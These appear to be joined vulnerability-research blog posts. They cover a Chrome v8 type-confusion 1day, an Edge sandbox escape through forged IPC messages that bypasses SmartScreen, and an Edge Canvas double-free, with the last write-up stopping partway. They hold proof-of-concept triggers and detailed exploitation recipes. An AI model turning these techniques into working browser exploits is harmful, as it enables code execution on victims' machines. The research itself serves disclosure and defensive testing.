Patch-gapping is the practice of exploiting vulnerabilities in open-source software that are already fixed (or are in the process of being fixed) by the developers before the actual patch is shipped to users. This window, in which the issue is semi-public while the user-base remains vulnerable, can range from from days to months. It is increasingly seen as a serious concern, with possible in-the-wild uses detected by Google. In a previous post, we demonstrated the feasibility of developing a 1day exploit for Chrome well before a patch is rolled out to users. In a similar vein, this post details the discovery, analysis and exploitation of another recent 1day vulnerability affecting Chrome.
Background
Besides analyzing published vulnerabilities, our nDay team also identifies possible security issues while the fixes are in development. An interesting change list on chromium-review piqued our interest in mid-August. It was for an issue affecting sealed and frozen objects, including a regression test that triggered a segmentation fault. It has been abandoned (and deleted) since then in favor of a different patch approach, with work continuing under CL 1760976, which is a much more involved change.
Since the fix turned out to be so complex, the temporary solution for the 7.7 v8 branch was to disable the affected functionality. This will only be rolled into a stable release on the 10th of September, though. A similar change was made in the 7.6 branch but it came two days after a stable channel update to 76.0.3809.132, so it wasn’t included in that release. As such, the latest stable Chrome release remains affected. These circumstances made the vulnerability an ideal candidate to develop a 1day exploit for.
The commit message is descriptive, the issue is the result of the effects of Object.preventExtensions and Object.seal/freeze on the maps and element storage of objects and how incorrect map transitions are followed by v8 under some conditions. Since map handling in v8 is a complex topic, only the absolutely necessary details will be discussed that are required to understand the vulnerability. More information on the relevant topics can be found under the following links:
JS engines implement several optimizations on the property storage of objects. A common technique is to use separate backing stores for the integer keys (often called elements) and string/Symbol keys (usually referred to as slots or named properties). This allows the engines to potentially use continuous arrays for properties with integer keys, where the index maps directly to the underlying storage, speeding up access. String keyed values are also stored in an array but to get the index corresponding to the key, another level of indirection is needed. This information, among other things, is provided by the map (or HiddenClass) of the object.
The storage of object shapes in a HiddenClass is another attempt at saving storage space. HiddenClasses are similar in concept to classes in object-oriented languages. However, since it is not possible to know the property configuration of objects in a prototype-based language like JavaScript in advance, they are created on demand. JS engines only create a single HiddenClass for a given shape, which is shared by every object that has the same structure. Adding a named property to an object results in the creation of a new HiddenClass, which contains the storage details for all the previous properties and the new one, then the map of the object is updated, as shown below (figures from the v8 dev blog).
These transitions are saved in a HiddenClass chain, which is consulted when new objects are created with the same named properties, or the properties are added in the same order. If there is a matching transition, it is reused, otherwise a new HiddenClass is created and added to the transition tree.
The properties themselves can be stored in three places. The fastest is in-object storage, which only needs a lookup for the key in the HiddenClass to find the index into the in-object storage space. This is limited to a certain number of properties, others are stored in the so-called fast storage, which is a separate array pointed by the properties member of the object, as shown below.
If an object has many properties added and deleted, it can get expensive to maintain the HiddenClasses. V8 uses heuristics to detect such cases and migrate the object to a slow, dictionary based property storage, as shown on the following diagram.
Another frequent optimization is to store the integer keyed elements in a dense or packed format, if they can all fit in a specific representation, e.g. small integer or float. This bypasses the usual value boxing in the engines, which stores numbers as pointers to Number objects, thus saving space and speeding up operations on the array. V8 handles several such element kinds, for example PACKED_SMI_ELEMENTS, which denotes an elements array with small integers stored contiguously. This storage format is tracked in the map of the object and needs to be kept updated all the time to avoid type confusion issues. Element kinds are organized into a lattice, transitions are only ever allowed to more general types. This means that adding a float value to an object with PACKED_SMI_ELEMENTS elements kind will convert every value to double, set the newly added value and change the element kind to PACKED_DOUBLE_ELEMENTS.
preventExtensions, seal and freeze
JavaScript provides several ways to fix the set of properties on an object.
Object.preventExtensions: prevents new properties from being added to the object.
Object.seal: prevents the addition of new properties, as well as the reconfiguration of existing ones (changing their writable, enumerable or configurable attributes).
Object.freeze: the same as Object.seal but also prevent the changing of property values, thus effectively prohibiting any change to an object.
PoC analysis
The vulnerability arises because v8 follows map transitions in certain cases without updating the element backing store accordingly, which can have wide-ranging consequences. A modified trigger with comments is shown below.
// Based on test/mjsunit/regress/regress-crbug-992914.js
function mainSeal() {
const a = {foo: 1.1}; // a has map M1
Object.seal(a); // a transitions from M1 to M2 Map(HOLEY_SEALED_ELEMENTS)
const b = {foo: 2.2}; // b has map M1
Object.preventExtensions(b); // b transitions from M1 to M3 Map(DICTIONARY_ELEMENTS)
Object.seal(b); // b transitions from M3 to M4
const c = {foo: Object} // c has map M5, which has a tagged `foo` property, causing the maps of `a` and `b` to be deprecated
b.__proto__ = 0; // property assignment forces migration of b from deprecated M4 to M6
a[5] = 1; // forces migration of a from the deprecated M2 map, v8 incorrectly uses M6 as new map without converting the backing store. M6 has DICTIONARY_ELEMENTS while the backing store remained unconverted.
}
mainSeal();
In the proof-of-concept code, two objects, a and b are created with the same initial layout, then a is sealed and Object.preventExtensions and Object.seal is called on b. This causes a to switch a map with HOLEY_SEALED_ELEMENTS elements kind and b is migrated to slow property storage via a map with DICTIONARY_ELEMENTS elements kind.
The vulnerability is triggered in lines 10-13. Line 10 creates object c with an incompatibly typed foo property. This causes a new map with a tagged foo property to be created for c and the maps of a and b are marked deprecated. This means that they will be migrated to a new map on the next property set operation. Line 11 triggers the transition for b, Line 13 triggers it for a. The issue is that v8 mistakenly assumes that a can be migrated to the same map as b but fails to also convert the backing store. This causes a type confusion to happen between a FixedArray (the Properties array shown in the Object Layout In v8 section) and a NumberDictionary (the Properties Dict).
A type confusion the other way around is also possible, as demonstrated by another regression test in the patch. There are probably also other ways this invalid map transition could be turned into an exploitable primitive, for example by breaking assumptions made by the optimizing JIT compiler.
Exploitation
The vulnerability can be turned into an arbitrary read/write primitive by using the type confusion shown above to corrupt the length of an Array, then using that Array for further corruption of TypedArrays. These can then be leveraged to achieve arbitrary code execution in the renderer process.
FixedArray and NumberDictionary Memory Layout
FixedArray is the C++ class used for the backing store of several different JavaScript objects. It has a simple layout, shown below, with only a map pointer, a length field stored as a v8 small integer (essentially a 31-bit integer left-shifted by 32), then the elements themselves.
The NumberDictionary class implements an integer keyed hash table on top of FixedArray. Its layout is shown below. It has four additional members besides map and length:
elements: the number of elements stored in the dictionary.
deleted: number of deleted elements.
capacity: number of elements that can be stored in the dictionary. The length of the FixedArray backing a number dictionary will be three times its capacity plus the extra header members of the dictionary (four).
max number key index: the greatest key stored in the dictionary.
The vulnerability makes it possible to set these four fields to arbitrary values in a plain FixedArray, then trigger the type confusion and treat them as header fields of a NumberDictionary.
Elements in a NumberDictionary are stored as three slots in the underlying FixedArray. E.g. the element with the key 0 starts at 0x2d7782c4bf10 above. First comes the key, then the value, in this case a small integer holding 0x4141, then the PropertyDescriptor denoting the configurable, writable, enumerable attributes of the property. The 0xc000000000 PropertyDescriptor corresponds to all three attributes set.
The vulnerability makes all header fields of a NumberDictionary, except length, controllable by setting them to arbitrary values in a plain FixedArray, then treating them as header fields of a NumberDictionary by triggering the issue. While the type confusion can also be triggered in the other direction, it did not yield any immediately promising primitives. Further type confusions can also be caused by setting up a fake PropertyDescriptor to confuse a data property with an accessor property but these also proved too limited and were abandoned.
The capacity field is the most interesting from an exploitation perspective, since it is used in most bounds calculations. When attempting to set, get or delete an element, the HashTable::FindEntry function is used to get the location of the element corresponding to the key. Its code is shown below.
// Find entry for key otherwise return kNotFound.
template <typename Derived, typename Shape>
int HashTable<Derived, Shape>::FindEntry(ReadOnlyRoots roots, Key key,
int32_t hash) {
uint32_t capacity = Capacity();
uint32_t entry = FirstProbe(hash, capacity);
uint32_t count = 1;
// EnsureCapacity will guarantee the hash table is never full.
Object undefined = roots.undefined_value();
Object the_hole = roots.the_hole_value();
USE(the_hole);
while (true) {
Object element = KeyAt(entry);
// Empty entry. Uses raw unchecked accessors because it is called by the
// string table during bootstrapping.
if (element == undefined) break;
if (!(Shape::kNeedsHoleCheck && the_hole == element)) {
if (Shape::IsMatch(key, element)) return entry;
}
entry = NextProbe(entry, count++, capacity);
}
return kNotFound;
}
The hash tables in v8 use quadratic probing with a randomized hash seed. This means that the hash argument in the code, and the exact layout of dictionaries in memory will change from run to run. The FirstProbe and NextProbe functions, shown below, are used to look for the location where the value is stored. Their size argument is the capacity of the dictionary and thus, attacker-controlled.
Capacity is a power-of-two number under normal conditions and masking the probes with capacity-1 results in limiting the range of accesses to in-bounds values. However, setting the capacity to a larger value via the type-confusion will result in out-of-bounds accesses. The issue with this approach is the random hash seed, which will cause probes and thus out-of-bounds accesses to random offsets. This can easily results in crashes, as v8 will try to interpret any odd value as a tagged pointer.
A possible solution is to set capacity to an out-of-bounds number k that is a power-of-two plus one. This causes the FindEntry algorithm to only visit two possible locations, one at offset zero, and one at offset k (times three). With careful padding, a target Array can be placed following the dictionary, which has its length property at just that offset. Invoking a delete operation on the dictionary with a key that is the same as the length of the target Array will cause the algorithm to replace the length with the hole value. The hole is a valid pointer to a static object, in effect a large value, allowing the target Array to be used for more convenient, array-based out-of-bounds read and write operations.
While this method can work, it is nondeterministic due to the randomization and the degraded nature of the corrupted NumberDictionary. However, failure does not crash Chrome and is easily detectable; reloading the page reinitializes the hash seed so the exploit can be attempted an arbitrary number of times.
Arbitrary Code Execution
The following object layout is used to gain arbitrary read/write access to the process memory space:
o: the object that will be used to trigger the vulnerability.
padding: an Array that is used as padding to get the target float array at exactly the right offset from o.
float_array: the Array that is the target of the initial length corruption via the out-of-bounds element deletion on o.
tarr: a TypedArray used to corrupt the next typed array.
aarw_tarr: typed array used for arbitrary memory access.
obj_addrof: object used to implement the addrof primitive which leaks the address of an arbitrary JavaScript object.
The exploit achieves code execution by the following the usual steps after the initial corruption:
Create the layout described above.
Trigger the vulnerability, corrupt the length of float_array through the deletion of a property on o. Restart the exploit by reloading the page in case this step fails.
Corrupt the length of tarr to increase reliability, since continued usage of the corrupted float array can introduce problems.
Corrupt the backing store of aarw_tarr and use it to gain arbitrary read write access to the address space.
Load a WebAssembly module. This maps a read-write-executable memory region of 4KiB into the address space.
Traverse the JSFunction object hierarchy of an exported function from the WebAssembly module using the arbitrary read/write primitive to find the address of the read-write-executable region.
Replace the code of the WebAssembly function with shellcode and execute it by invoking the function.
The complete exploit code can be found on our GitHub page and seen in action below. Note that a separate vulnerability would be needed to escape the sandbox employed by Chrome.
Detection
The exploit doesn’t rely on any uncommon features or cause unusual behavior in the renderer process, which makes distinguishing between malicious and benign code difficult without false positive results.
Mitigation
Disabling JavaScript execution via the Settings / Advanced settings / Privacy and security / Content settings menu provides effective mitigation against the vulnerability.
Conclusion
Subscribers of our nDay feed had access to the analysis and functional exploit 5 working days after the initial patch attempt appeared on chromium-review. A fix in the stable channel of Chrome will only appear in version 77, scheduled to be released tomorrow.
Malicious actors probably have capabilities based on patch-gapping. Timely analysis of such vulnerabilities allows our customers to test how their defensive measures hold up against unpatched security issues. It also enables offensive teams to test the detection and response functions within their organization.
This is the second part of the blog post on the Microsoft Edge full-chain exploit. It provides analysis and describes exploitation of a logical vulnerability in the implementation of the Microsoft Edge browser sandbox which allows arbitrary code execution with Medium Integrity Level.
Background
Microsoft Edge employs various Inter-Process Communication (IPC) mechanisms to communicate between content processes, the Manager process and broker processes. The one IPC mechanism relevant to the described vulnerability is implemented as a set of custom message passing functions which extend the standard Windows API PostMessage() function. These functions look like the following:
The listed functions are used to send messages with or without data and are stateless. No direct way to get the result of an operation is supported. The functions return only the result of the message posting operation, which does not guarantee that the requested action has completed successfully. The main goal of these functions is to trigger certain events (e.g. when a user is clicking on the navigation panel), signal state information, and notification of user interface changes.
Messages are sent to the windows of the current process or the windows of the Manager process. A call to PostMessage() is chosen when the message is sent to the current process. For the inter-process messaging a shared memory section and Windows events are employed. The implementation details are hidden from the developer and the direction of the message is chosen based on the value of the window handle. Each message has a unique identifier which denotes the kind of action to perform as a response to the trigger.
Messages that are supposed to be created as a reaction to a user triggered event are passed from one function to another through the virtual layer of different handlers. These handlers process the message and may pass the message further with a different message identifier.
The Vulnerability
The Microsoft Edge Manager process accepts messages from other processes, including content process. Some messages are meant to be run only internally, without crossing process boundaries. A content process can send messages which are supposed to be sent only within the Manager process. If such a message arrives from a content process, it is possible to forge user clicks and thus download and launch an arbitrary binary.
When the download of an executable file is initiated (either by JavaScript code or by user request) the notification bar with buttons appears and the user is offered three options: “Run” to run the offered file, “Download” to download, or “Cancel” to cancel. If the user clicks “Run”, a series of messages are posted from one Manager process window to another. It is possible to see what kind of messages are passed in the debugger by using following breakpoints:
bu edgeIso!LCIEPostMessage ".printf \"\\n---\\n%y(%08x, %08x, %08x, ...)\\n\", @rip, @rcx, @rdx, @r8; k L10; g"
bu edgeIso!LCIEPostMessageWithoutBuffer ".printf \"\\n---\\n%y(%08x, %08x, %08x, ...)\\n\", @rip, @rcx, @rdx, @r8; k L10; g"
bu edgeIso!LCIEPostMessageWithDISPPARAMS ".printf \"\\n---\\n%y(%08x, %08x, %08x, ...)\\n\", @rip, @rcx, @rdx, @r8; k L10; g"
bu edgeIso!IsoPostMessage ".printf \"\\n---\\n%y(%08x, %08x, %08x, ...)\\n\", @rip, @rcx, @rdx, @r8; k L10; g"
bu edgeIso!IsoPostMessageWithoutBuffer ".printf \"\\n---\\n%y(%08x, %08x, %08x, ...)\\n\", @rip, @rcx, @rdx, @r8; k L10; g"
bu edgeIso!IsoPostMessageUsingVirtualAddress ".printf \"\\n---\\n%y(%08x, %08x, %08x, ...)\\n\", @rip, @rcx, @rdx, @r8; k L10; g"
There are a large number of messages sent during the navigation and subsequent file download, which forms a complex order of actions. The following list represents a simplified description of the actions performed by either a content process (CP) or the Manager process (MP) during ordinary user activities:
a user clicks on a link to navigate (or the navigation is triggered by JavaScript code)
a navigation event is fired (messages sent from CP to MP)
messages for the modal download notification bar creation and handling are sent (CP to MP)
the modal notification bar appears
messages to handle the navigation and the state of the history are sent (CP to MP)
messages are sent to handle DOM events (CP to MP)
the download is getting handled again; messages with relevant download information are passed (CP to MP)
the user clicks “Run” to run the file download
messages are sent about the state of the download (MP to CP)
the CP responds with updated file download information and terminates download handling in its own process
the MP picks up file download handling and starts sending messages to its own Windows (MP to MP)
the MP starts the security scan of the downloaded file (MP to MP)
if the scan has completed successfully, a message is sent to the broker process to run the file
the “browser_broker.exe” broker process launches the executable file
The first message in the series of calls is the response to the user’s click and it initiates the actual series of message passing events. Next follows a message which is important for the exploit because the call stack includes the function which the exploit will imitate. Excerpt of the debugger log file looks like the following:
The last message sent is important as well, it has the identifier 0xd6b and it initiates running the file. Excerpt of the debugger log file looks like the following:
The message sent by SpartanCore::DownloadsHandler::SendCommand() is spoofed by the exploit code.
Exploit Development
The exploit code is completely implemented in Javascript and calls the required native functions from Javascript.
The exploitation process can be divided into the following stages:
changing location origin of the current document
executing the JavaScript code which offers to run the download file
posting a message to the Manager process which triggers the file to be run
restoring original location.
Depending on the location of the site, the Edge browser may warn the user about potentially unsafe file download. In the case of internet sites, the user is always warned. As well the Edge browser checks the referrer of the download and may refuse to run the downloaded file even when the user has explicitly chosen to run the file. Additionally, the downloaded file is scanned with Microsoft Windows Defender SmartScreen which blocks any file from running if the file is considered malicious. This prevents a successful attack.
However, when a download is initiated from the “file://” URL and the download referrer is also from the secure zone (or without a zone as is the case with the “blob:” protocol), the downloaded file is not marked with the “Mark of the Web” (MotW). This completely bypasses checks by Microsoft Defender SmartScreen and allows running the downloaded file without any restrictions.
For the first step the exploit finds the current site URL and overwrites it with a “file:///” zone URL. The URL of the site is found by reading relevant pointers in memory. After the site URL is overwritten, the renderer process treats any download that is coming from the current site as coming from the “file:///” zone.
For the second step the exploit executes the JavaScript code which fetches the download file from the remote server and offers it as a download:
The executed JavaScript initiates the file download and internally the Edge browser caches the file and keeps a temporary copy as long as the user has not responded to the download notification bar. Before any file download, a Globally Unique Identifier (GUID) is created for the actual download file. The Edge browser recognizes downloads not by the filename or the path, but by the download GUID. Messages which send commands to do any file operation must pass the GUID of the actual file. Therefore it is required to find the actual file download GUID. The required GUID is created by the content process during the call to EdgeContent!CDownloadState::Initialize():
.text:0000000180058CF0 public: long CDownloadState::Initialize(class CInterThreadMarshal *, struct IStream *, unsigned short const *, struct _GUID const &, unsigned short const *, struct IFetchDownloadContext *) proc near
...
.text:0000000180058E6F loc_180058E6F:
.text:0000000180058E6F mov edi, 8007000Eh
.text:0000000180058E74 test rbx, rbx
.text:0000000180058E77 jz loc_180058FF0
.text:0000000180058E7D test r13b, r13b
.text:0000000180058E80 jnz short loc_180058E93
.text:0000000180058E82 lea rcx, [rsi+74h] ; pguid
.text:0000000180058E86 call cs:__imp_CoCreateGuid
Next follows the call to EdgeContent!DownloadStateProgress::LCIESendToDownloadManager(). This function packs all the relevant download data (such as the current URL, path to the cache file, the referrer, name of the file, and the mime type of the file), adds padding for the meta-data, creates the so called “message buffer” and sends it to the Manager process via a call to LCIEPostMessage(). As this message is getting posted to another process, all the data is eventually placed at the shared memory section and is available for reading and writing by both the content and Manager processes. The message buffer is eventually populated with the download file GUID.
The described operation performed by DownloadStateProgress::LCIESendToDownloadManager() is important for the exploit as it indirectly leaks the address of the message buffer and the relevant download file GUID.
The allocation address of the message buffer depends on the size of the message. There are several ranges of sizes:
0x0 to 0x20 bytes: unsupported (message posting fails)
0x20 to 0x1d0 bytes: first slot
0x1d4 to 0xfd0 bytes: second slot
from 0x1fd4 bytes: last slot
If the previous message with the same size slot was freed, the new message is allocated at the same address. The specifics of the message buffer allocator allows leaking the address of the next buffer without the risk of failure. After the file download is triggered, the exploit gets the address of the message buffer. After the address of the message buffer is retrieved, it is possible to parse the message buffer and extract relevant data (such as the cache path and the file download GUID).
The last important step is to send a message which triggers the browser to run the downloaded file (the actual file operation is performed by the browser broker “browser_broker.exe”) with Medium Integrity Level. The exploit code which performs the current step is borrowed from eModel!TFlatIsoMessage<DownloadOperation>::Post():
__int64 __fastcall TFlatIsoMessage<DownloadOperation>::Post(
unsigned int a1,
unsigned int a2,
__int64 a3,
__int64 a4,
__int64 a5
)
{
unsigned int v5; // esi
unsigned int v6; // edi
signed int result; // ebx
__int64 isoMessage_; // r8
__m128i threadStateGUID; // xmm0
unsigned int v11; // [rsp+20h] [rbp-48h]
__int128 tmpThreadStateGUID; // [rsp+30h] [rbp-38h]
__int64 isoMessage; // [rsp+40h] [rbp-28h]
unsigned int msgBuffer; // [rsp+48h] [rbp-20h]
v5 = a2;
v6 = a1;
result = IsoAllocMessageBuffer(a1, &msgBuffer, 0x48u, &isoMessage);
if ( result >= 0 )
{
isoMessage_ = isoMessage;
*(isoMessage + 0x20) = *a5;
*(isoMessage_ + 0x30) = *(a5 + 0x10);
*(isoMessage_ + 0x40) = *(a5 + 0x20);
threadStateGUID = *GlobalThreadState();
v11 = msgBuffer;
_mm_storeu_si128(&tmpThreadStateGUID, threadStateGUID);
result = IsoPostMessage(v6, v5, 0xD6Bu, 0, v11, &tmpThreadStateGUID);
if ( result < 0 )
{
IsoFreeMessageBuffer(msgBuffer);
}
}
return result;
}
Last, the exploit recovers the original site URL to avoid any potential artifacts and sends messages to remove the download notification bar.
Open problems
The only issue with the exploit is that a small popup will appear for a split second before the exploit has sent a message to click the popup button. Potentially it is possible to avoid this popup by sending a different set of messages which does not require a popup to be present.
Detection
There are no trivial methods to detect exploitation of the described vulnerability as the exploit code does not require any kind of particularly notable data and is not performing any kind of exceptional activity.
Mitigation
The exploit is developed in Javascript, but there is a possibility to develop an exploit not based on Javascript which makes it non-trivial to mitigate the issue with 100% certainty.
For exploits developed in Javascript, it is possible to mitigate this issue by disabling Javascript.
The sandbox escape exploit part is 100% reliable and portable—thus requiring almost no effort to keep it compatible with different browser versions.
Here is the video demonstrating the full exploit-chain in action:
For demonstration purposes, the exploit payload writes a file named “w00t.txt” to the user desktop, opens this file with notepad and shows a message box with the integrity level of the “payload.exe”.
Subscribers of the Exodus 0day Feed had access to this exploit for penetration tests and implementing protections for their stakeholders.
This year Exodus Intelligence participated in the Pwn2Own competition in Vancouver. The chosen target was the Microsoft Edge browser and a full-chain browser exploit was successfully demonstrated. The exploit consisted of two parts:
logical vulnerability sandbox escape exploit achieving arbitrary code execution with Medium Integrity Level
This blog post describes the exploitation of the double-free vulnerability in the renderer process of Microsoft Edge 64-bit. Part 2 will describe the sandbox escape vulnerability.
The Vulnerability
The vulnerability is located in the Canvas 2D API component which is responsible for creating canvas patterns. The crash is triggered with the following JavaScript code:
let canvas = document.createElement('canvas');
let ctx = canvas.getContext('2d');
// Allocate canvas pattern objects and populate hash table.
for (let i = 0; i < 31; i++) {
ctx.createPattern(canvas, 'no-repeat');
}
// Here the canvas pattern objects will be freed.
gc();
// This is causing internal OOM error.
canvas.setAttribute('height', 0x4000);
canvas.setAttribute('width', 0x4000);
// This will partially initialize canvas pattern object and trigger double-free.
try {
ctx.createPattern(canvas, 'no-repeat');
} catch (e) {
}
If you run this test-case, you may notice that the crash does not happen always, several attempts may be required. In one of the next sections it will be explained why.
With the page heap enabled, the crash would look like this:
On line 21 the heap manager allocates space for the canvas pattern object and on the following lines certain members are set to 0. It is important to note the CCanvasPattern::Data member is populated on line 28.
Next follows a call to the CCanvasRenderingProcessor2D::EnsureBitmapRenderTarget() method which is responsible for video memory allocation for the canvas pattern object on a target device. In certain cases this method returns an error. For the given vulnerability the bug is triggered when Windows GDI D3DKMTCreateAllocation() returns the error STATUS_GRAPHICS_NO_VIDEO_MEMORY (error code 0xc01e0100). Setting width and height of the canvas object to huge values can cause the video device to return an out-of-memory error. The following call stack shows the path which is taken after the width and height of the canvas object have been set to the large values and after consecutive calls to createPattern():
A requirement to trigger the error is that the target hardware has an integrated video card or a video card with low memory. Such conditions are met on the VMWare graphics pseudo-hardware or on some budget devices. It is potentially possible to trigger other errors which do not depend on the target hardware resources as well.
Under normal conditions (i.e. the call to CCanvasRenderingProcessor2D::EnsureBitmapRenderTarget() method does not return any error) the CCanvasPattern::Initialize() method is called:
On line 40 one of the canvas pattern object members is set to point to the CCanvasPattern::Data object.
During the call to the CCanvasPattern::InitializeFromCanvas() method, a chain of calls follows. This eventually leads to a call of the following method:
The above method adds a display resource to the cache. In the current case, the display resource is the DXImageRenderTarget object and the cache is a hash table which is implemented in the TDispResourceCache class.
On line 32 the call to the TDispResourceCache<CDispNoLock,1,0>::Add() method happens:
On line 27 the vulnerable object is getting allocated. Important to note that the object is not allocated through the MemGC mechanism.
The hash table entries consist of a key-value pair. The key is a CCanvasPattern::Data object and the value is a DXImageRenderTarget. The initial size of the hash table allows it to hold up to 29 entries, however there is space for 37 entries. Extra entries are required to reduce the amount of possible hash collisions. A hash function is applied to each key to deduce position in the hash table. When the hash table is full, CHtPvPvBaseT<&int nullCompare(…),HashTableEntry>::Grow() method is called to increase the capacity of the hash table. During this call, key-value pairs are moved to the new indexes, keys are removed from the previous position, but values remain. If, after the growth, the key-value pair has to be removed (e.g.canvas pattern objects is freed), the value is freed and the key-value pair is removed only from the new position.
When the amount of entries is below a certain value, CHtPvPvBaseT<&int nullCompare(…),HashTableEntry>::Shrink() method is called to reduce the capacity of the hash table. When the CHtPvPvBaseT<&int nullCompare(…),HashTableEntry>::Shrink() method is called, key-value pairs are moved to the previous positions.
When the canvas pattern object is freed, the hash table entry which holds the appropriate CCanvasPattern::Data object is removed via the following method call:
This method retrieves the hash table entry value by calling the CHtPvPvBaseT<&int nullCompare(…),HashTableEntry>::FindEntry() method.
If the call to CCanvasRenderingProcessor2D::EnsureBitmapRenderTarget() returns an error, the canvas pattern object has an uninitialized member which is supposed to hold a pointer to the CCanvasPattern::Data object. Nevertheless, the canvas pattern object destructor calls the CHtPvPvBaseT<&int nullCompare(…),HashTableEntry>::FindEntry() method and provides a key which is a nullptr. The method returns the very first value if there is any. If the hash table was grown and then shrunk, it will store pointers to the freed DXImageRenderTarget objects. Under such conditions, the TDispResourceCache<CDispNoLock,1,0>::Remove() method will operate on the already freed object (variable freedObject).
Several attempts are required to trigger vulnerability because there will not always be an entry at the first position.
It is possible to exploit this vulnerability in one of two ways:
allocate some object in place of the freed object and free it thus causing a use-after-free on an almost arbitrary object
allocate some object which has a suitable layout (first quad-word must be a pointer to an object with a virtual function table) to call a virtual function and cause side-effects like corrupting some useful data
The first method was chosen for exploitation because it’s difficult to find an object which fits the requirements for the second method.
Exploit Development
The exploit turned out to be non-trivial due to the following reasons:
Microsoft Edge allocates objects with different sizes and types on different heaps; this reduces the amount of available objects
the freed object is allocated on the default Windows heap which employs LFH; this makes it impossible to create adjacent allocations and reduces the chances of successful object overwrite
the freed object is 0x10 bytes; objects of this size are often used for internal servicing purposes; this makes the relevant heap region busy which also reduces exploitation reliability
there is a limited number of LFH objects of 0x10 bytes in size that are available from Javascript and are actually useful
objects that are available for control from Javascript allow only limited control
no object used during exploitation allows direct corruption of any field in a way that can lead to useful effects (e.g. controllable write)
multiple small heap allocations and frees were required to gain control over objects with interesting fields.
A high-level overview of the renderer exploitation process:
the heap is prepared and the objects required for exploitation are sprayed
all of the 0x10-byte DXImageRenderTarget objects are freed (one of them is the object which will be freed again)
audio buffer objects are sprayed; this also creates 0x10-byte raw data buffer objects with arbitrary size and contents; some of the buffers take the freed spots
the double-free is triggered and one of the 0x10-byte raw data buffer objects is freed (it is possible to read-write this object)
objects of 0x10-bytes size are sprayed, they contain two pointers (0x8-bytes) to 0x20-byte sized raw data buffer objects
the exploit iterates over the raw data buffer objects allocated on step 3 and searches for the overwrite
objects allocated on step 5 are freed (with 0x20-byte sized objects) and 0x20-byte sized typed arrays are sprayed over them
the exploit leaks pointers to two of the sprayed typed arrays
0x10-byte sized objects are sprayed, they contain two pointers to the 0x200-byte sized raw data buffer objects; audio source will keep writing to these buffers
the exploit leaks pointers to two of the sprayed write-buffer objects
the exploit starts playing audio, this starts writing to the controllable (vulnerable) object address of the typed array (the address is increased by 0x10 bytes to point to the length of the typed array) in the loop; the audio buffer source node keeps writing to the 0x200-byte data buffer, but is re-writing pointers to the buffer in the 0x10-byte object; the repeated write in the loop is required to win a race
after a certain amount of iterations the exploit quits looping and checks if the typed array has increased length
at this point exploit has achieved a relative read-write primitive
the exploit uses the relative read to find the WebCore::AudioBufferData and WTF::NeuteredTypedArray objects (they are placed adjacent on the heap)
the exploit uses data found during the previous step in order to construct a typed array which can be used for arbitrary read-write
the exploit creates a fake DataView object for more convenient memory access
with arbitrary read-write is achieved, the exploit launches a sandbox escape.
The following diagram can help understand the described steps:
Getting relative read-write primitive
To trigger the vulnerability, thirty canvas pattern objects are created, this forces the hash table to grow. Then the canvas pattern objects are freed and the hash table is shrunk; this creates a dangling pointer to the DXImageRenderTarget in the hash table entry. It is yet not possible to access the pointer to the freed object.
After the DXImageRenderTarget object is freed by the TDispResourceCache<CDispNoLock,1,0>::Remove method, the spray is performed to allocate audio context data buffer objects – let us call it spray “A”. Data buffer objects are created by calling audio context createBuffer(). This function has the following prototype:
let buffer = baseAudioContext.createBuffer(numOfchannels, length, sampleRate);
The numOfchannels argument denotes a number of pointers to channel data to create, length is the length of the data buffer, sampleRate is not important for exploitation. Javascript createBuffer() triggers the call to CDOMAudioContext::Var_createBuffer(), which eventually calls WebCore::AudioChannelData::Initialize():
On line 17 a WTF::IEOwnedTypedArray object is allocated on the default Windows heap. This object is interesting for exploitation as it contains the following metadata:
0:016> dq 000001b0`374fbd80 L20/8
000001b0`374fbd80 00007ffe`47f8b4a0 000001b0`379e9030 ; vtable; pointer to the data buffer
000001b0`374fbd90 00000000`00000030 00080000`00000000 ; length; unused
0:016> dq 000001b0`379e9030 L10/8
000001b0`379e9030 0000003a`cafebeef 00000000`00000002 ; arbitrary data
0:016> ln 00007ffe`47f8b4a0
(00007ffe`47f8b4a0) edgehtml!WTF::IEOwnedTypedArray<1,float>::`vftable`
On line 21 the data buffer is allocated (also on the default Windows heap). One of the buffers takes the spot of the freed DXImageRenderTarget object. This data buffer has the following layout:
The second quad-word is a reference counter. Values other than 1 trigger access to the virtual function table which does not exist and cause a crash. A reference counter value of 1 means that the object is going to be freed.
The data buffer which is allocated in place of the freed object is used throughout the exploit to read and write values placed inside this buffer.
Before freeing the object for the second time, audio context buffer sources are created by calling Javascript createBufferSource(). This function does not accept any arguments, but is expecting the buffer property to be set. Allocations are made before the vulnerable object is freed so to avoid unnecessary noise on the heap – let us call it spray “B”. The buffer property is set to one of the buffer objects which were created during startup (i.e. before triggering the vulnerability) by calling createBuffer() – let us call it spray “C”. During this property access, the following method is called:
On line 71 yet another data buffer is allocated. The amount of bytes depends on the number of channels. Each channel creates one pointer which points to the data with arbitrary size and controllable contents. This is a useful primitive which is used later during the exploitation process.
To trigger the call to the WebCore::AudioBufferSourceNode::setBuffer() method, the audio must be already playing: either start() is called with the buffer property already set, or the buffer property is set and then start() is called.
Next, the double-free vulnerability is triggered and one of the audio channel data buffers is freed, although control from Javascript is retained.
The start() method of the audio buffer source object is called on each object of spray “B”. This creates multiple 0x10-byte sized objects with two pointers to the 0x20-byte sized data buffer object of spray “C”. During this spray one of the sprayed objects takes over the freed object from spray “A”.
Then the exploit iterates over spray “A” to find a data buffer with changed contents. Each object of spray “A” has getChannelData() – which returns the channel data as a Float32Array typed array. getChannelData() accepts only the channel number argument. Once the change has been found, a typed array is created. This typed array is read-writable and is further used multiple times in the exploit to leak and write pointers. Let us call it typed array “TA1”.
After the controllable channel data typed array is found, all of the spray “B”objects are freed. All data relevant to spray “B” is scoped just to one function. This is required to remove all internal references from Javascript to the data buffer from spray “C”. Otherwise it will not be possible to free the data buffer later.
After the return from the function, another spray is made – let us call it spray “D”. This spray prepares an audio buffer source data for the next steps and takes over the freed object. At this point the overwritten object does not contain data.
Then the exploit iterates over spray “D” and calls the start() function of each object. This writes to the freed object two pointers pointing to the 0x200-byte sized objects. These objects are used by the audio context to write audio data to be played. It is important to note that data is periodically written to this buffer, as well as pointers constantly written to the 0x10-byte objects. (This poses another problem which is resolved at the next step.) These pointers are also leaked via the “TA1” typed array.
